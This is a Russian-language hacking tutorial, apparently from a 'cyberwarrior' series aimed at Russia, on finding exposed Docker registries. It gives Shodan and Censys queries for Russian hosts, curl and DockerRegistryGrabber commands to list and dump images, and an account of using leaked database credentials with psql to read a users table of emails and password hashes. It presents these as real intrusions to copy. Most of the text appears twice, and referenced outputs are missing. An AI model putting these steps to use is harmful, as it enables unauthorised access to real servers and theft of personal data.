Добро пожаловать обратно, мои начинающие кибервоины!
В этом сериале Эйркоридор, наш человек на Украине, берёт вас с собой на реальные кибервойны против жестокой российской военной машины. Присоединяйтесь, наслаждайтесь и учитесь, наблюдая, как он использует свои начинающие навыки кибервойны, чтобы спасти свою страну от Путина и его дружков-клептократов!
Amazon ECR — это полностью управляемый сервис реестра контейнеров Docker, который упрощает хранение, управление и развертывание образов контейнеров. ECR позволяет всем разработчикам сохранять конфигурации и быстро переносить их в производственную среду, тем самым снижая общую нагрузку. Рекомендуется проверять реестр, поскольку невнимательные разработчики могут оставлять конфиденциальную информацию.
Основные моменты работы ECR:
https://{account_id}.dkr.ecr.{region}.amazonaws.com/{repository_name}
Мы также можем найти российские серверы, работающие под управлением Docker Registry с использованием Shodan:
порт:5000 страна: «RU» продукт: «Docker Registry HTTP API» .
Это также можно сделать через Censys: ((Docker Registry) и services.port=`5000`) и location.country =`Russia`
Чтобы убедиться, что это реестр Docker, мы можем запустить сканирование nmap:
Чтобы проверить, требует ли реестр авторизации, мы можем выполнить простую команду curl:
kali> curl -k http://<IP>:5000/v2/_catalog
Если авторизация не настроена, то мы можем получить список всех репозиториев:
Для анализа образа можно использовать DockerRegistryGrabber, чтобы получить дамп его содержимого. Вот как установить этот инструмент:
kali> git clone https://github.com/Syzik/DockerRegistryGrabber.git
kali> cd DockerRegistryGrabber
kali> python -m pip install -r requirements.txt
Вы можете получить список доступных изображений с помощью следующей команды:
kali> python drg.py http://<IP> –list
После этого вы можете сбросить одно из изображений или все сразу:
kali> python drg.py http://<IP> –dump <имя>
Чтобы извлечь все изображения, используйте флаг –dump_all .
Дампы вы можете найти в каталоге этого инструмента:
Внутри вы увидите различные архивы, в которых может храниться важная информация:
Например, таким образом был найден снимок одного из модулей приложения Java.
Он содержал файл конфигурации с данными подключения к базе данных:
Для подключения я использовал следующую команду:
kali> psql -h <IP> -p <порт>-U <пользователь> -d <база данных>
Перечислены все таблицы: host: dt
Перечислены все данные из таблицы пользователей: host: SELECT * FROM users;
Идентификаторы, имена, адреса электронной почты и хэши паролей — все доступно.
Продолжайте учиться и совершенствоваться. Docker постоянно набирает популярность, но безопасность не всегда является главным приоритетом для разработчиков. Поэтому это ещё одна важная технология в вашем арсенале.
В этом сериале Эйркоридор, наш человек на Украине, берёт вас с собой на реальные кибервойны против жестокой российской военной машины. Присоединяйтесь, наслаждайтесь и учитесь, наблюдая, как он использует свои начинающие навыки кибервойны, чтобы спасти свою страну от Путина и его дружков-клептократов!
Миссия
Слушай, рядовой. Как говорит Мастер OTW, «только дурак идёт в бой без надлежащей разведки». Поэтому сегодня мы сосредоточим все усилия на эффективном сборе информации в реестре Amazon Elastic Container Registry (Amazon ECR).
Amazon ECR — это полностью управляемый сервис реестра контейнеров Docker, который упрощает хранение, управление и развертывание образов контейнеров. ECR позволяет всем разработчикам сохранять конфигурации и быстро переносить их в производственную среду, тем самым снижая общую нагрузку. Рекомендуется проверять реестр, поскольку невнимательные разработчики могут оставлять конфиденциальную информацию.
Основные моменты работы ECR:
- ECR предоставляет управляемый реестр Docker в учетной записи AWS.
- Для организации образов контейнеров используются репозитории.
- Аутентификация осуществляется через AWS IAM.
- Изображения загружаются и извлекаются с помощью стандартных команд Docker после аутентификации.
- ECR предлагает дополнительные функции, такие как автоматическое сканирование изображений и политики жизненного цикла.
- Он тесно интегрируется с другими сервисами AWS, в частности ECS (Elastic Container Service) и EKS (Elastic Kubernetes Service).
https://{account_id}.dkr.ecr.{region}.amazonaws.com/{repository_name}
Мы также можем найти российские серверы, работающие под управлением Docker Registry с использованием Shodan:
порт:5000 страна: «RU» продукт: «Docker Registry HTTP API» .
Это также можно сделать через Censys: ((Docker Registry) и services.port=`5000`) и location.country =`Russia`
Чтобы убедиться, что это реестр Docker, мы можем запустить сканирование nmap:
Чтобы проверить, требует ли реестр авторизации, мы можем выполнить простую команду curl:
kali> curl -k http://<IP>:5000/v2/_catalog
Если авторизация не настроена, то мы можем получить список всех репозиториев:
Для анализа образа можно использовать DockerRegistryGrabber, чтобы получить дамп его содержимого. Вот как установить этот инструмент:
kali> git clone https://github.com/Syzik/DockerRegistryGrabber.git
kali> cd DockerRegistryGrabber
kali> python -m pip install -r requirements.txt
Вы можете получить список доступных изображений с помощью следующей команды:
kali> python drg.py http://<IP> –list
После этого вы можете сбросить одно из изображений или все сразу:
kali> python drg.py http://<IP> –dump <имя>
Чтобы извлечь все изображения, используйте флаг –dump_all .
Дампы вы можете найти в каталоге этого инструмента:
Внутри вы увидите различные архивы, в которых может храниться важная информация:
Например, таким образом был найден снимок одного из модулей приложения Java.
Он содержал файл конфигурации с данными подключения к базе данных:
Для подключения я использовал следующую команду:
kali> psql -h <IP> -p <порт>-U <пользователь> -d <база данных>
Перечислены все таблицы: host: dt
Перечислены все данные из таблицы пользователей: host: SELECT * FROM users;
Идентификаторы, имена, адреса электронной почты и хэши паролей — все доступно.
Краткое содержание:
Хакерство — важнейший навык в XXI веке! Хакерские навыки, как и любые другие, можно использовать как во благо, так и во вред. Когда ваша страна подвергается нападению со стороны такого могущественного и жестокого диктатора, как Путин, может возникнуть необходимость использовать свои навыки для её спасения.Продолжайте учиться и совершенствоваться. Docker постоянно набирает популярность, но безопасность не всегда является главным приоритетом для разработчиков. Поэтому это ещё одна важная технология в вашем арсенале.